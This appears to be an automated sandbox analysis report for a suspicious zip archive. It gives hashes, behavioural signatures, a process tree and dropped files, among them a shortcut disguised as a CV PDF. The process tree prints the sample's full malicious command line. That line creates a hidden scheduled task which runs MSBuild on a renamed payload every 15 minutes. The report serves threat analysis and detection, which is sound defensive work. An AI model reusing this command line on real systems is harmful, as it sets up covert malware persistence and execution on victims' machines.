3fa93a1a5242d250209451d5775fe454b20b7da8e59b13061353e23e3fefff07

Resubmissions

10-01-2025 12:10

250110-pcbcpatmg1 10

10-01-2025 12:06

250110-n9yc2stmd1 3

Analysis

max time kernel
148s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
10-01-2025 12:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

logo_20679827913.zip
Size

442KB
MD5

fa5c021e56b481647d853080fdaf636b
SHA1

74cd529fc5ef4207dc7bbd4e34fccf5384f55df4
SHA256

3fa93a1a5242d250209451d5775fe454b20b7da8e59b13061353e23e3fefff07
SHA512

68537289234896199bc7676e139ef525bee1863657438e48d803b7d6aeffcaf8b93365e5452de7ac6bbb84b21ff803f713423c8aa64961664474a5c5d8695995
SSDEEP

12288:O3kr3yLqYHW1jU5QaYCrZYed6pHkaikY+vTr+2U:2++qD1I5XVFpyEdkYsTrhU

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2068	NOTEPAD.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1680	7zFM.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeRestorePrivilege	1680	7zFM.exe
Token: 35	1680	7zFM.exe
Token: SeSecurityPrivilege	1680	7zFM.exe
Token: SeRestorePrivilege	2768	7zG.exe
Token: 35	2768	7zG.exe
Token: SeSecurityPrivilege	2768	7zG.exe
Token: SeSecurityPrivilege	2768	7zG.exe
Token: SeRestorePrivilege	2224	7zG.exe
Token: 35	2224	7zG.exe
Token: SeSecurityPrivilege	2224	7zG.exe
Token: SeSecurityPrivilege	2224	7zG.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1680	7zFM.exe
1680	7zFM.exe
2768	7zG.exe
2224	7zG.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2040	2168	cmd.exe	42
PID 2168 wrote to memory of 2040	2168	cmd.exe	42
PID 2168 wrote to memory of 2040	2168	cmd.exe	42

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\logo_20679827913.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1680

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\logo_20679827913\" -spe -an -ai#7zMap3908:112:7zEvent31203
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2768

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\logo_20679827913\" -an -ai#7zMap18517:234:7zEvent26171
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c tar -xf Scan_document.zip|copy logo.png C:\Users\Admin\AppData\Local\Temp\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "C:\Windows\system32\cmd.exe /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml" /f &&start ~logo.png
1⤵
PID:1272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c tar -xf Scan_document.zip|copy logo.png C:\Users\Admin\AppData\Local\Temp\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "C:\Windows\system32\cmd.exe /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml" /f &&start ~logo.png
1⤵
PID:3056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c tar -xf Scan_document.zip|copy logo.png C:\Users\Admin\AppData\Local\Temp\darkmoon.xml &&schtasks /create /sc minute /mo 15 /tn Darkmoon_Gaming /tr "C:\Windows\system32\cmd.exe /c powershell -nop -w h Start-Process -N -F C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe -A C:\Users\Admin\AppData\Local\Temp\darkmoon.xml" /f &&start ~logo.png
  2⤵
  PID:2040

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\logo_20679827913\1.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\logo_20679827913\4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3

Filesize
444KB

MD5
9bec57e55df3a59a8e23e898a205d3b4

SHA1
df0fcd66f33e6d82bd650cee765a5d4010fdd728

SHA256
4c9a58b8a77a5f4c2e4a5ae070c25238aff20810b81e92393ef955f53e6eb5f3

SHA512
cc2aa36adbca5c738f9317b30a12849454dfcc719013db5c488191e7a873598a1287ac1261b22b3a12cbcbad5df9303562c8b0f69949d677fee5fdf26755d8d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\logo_20679827913\CV_Dinh Thi Thuy.pdf.lnk

Filesize
2KB

MD5
df29a780d7b81cc5cffbb67582f77f8c

SHA1
05de1bc87219d163e0b7cbb5a77d17fc31884f11

SHA256
be210a706826056a9284d41ec13070d46a1465ea8eef8b8ae66c548dba7d3fd1

SHA512
1ef8e9f16a4d69cb6d27b3ac333543a0cfcd362acee24af29a0c23fab6ae56e43fd202b7560182c725397c6b4363ec64cff294d4f07f2531f19d24f75b78c416

Download Submit